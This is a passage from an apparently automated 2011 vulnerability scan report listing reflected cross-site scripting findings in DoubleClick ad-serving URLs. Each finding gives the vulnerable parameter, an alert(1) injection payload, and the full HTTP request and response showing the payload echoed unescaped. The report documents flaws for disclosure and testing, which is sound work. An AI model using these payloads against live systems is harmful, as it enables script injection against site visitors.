Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
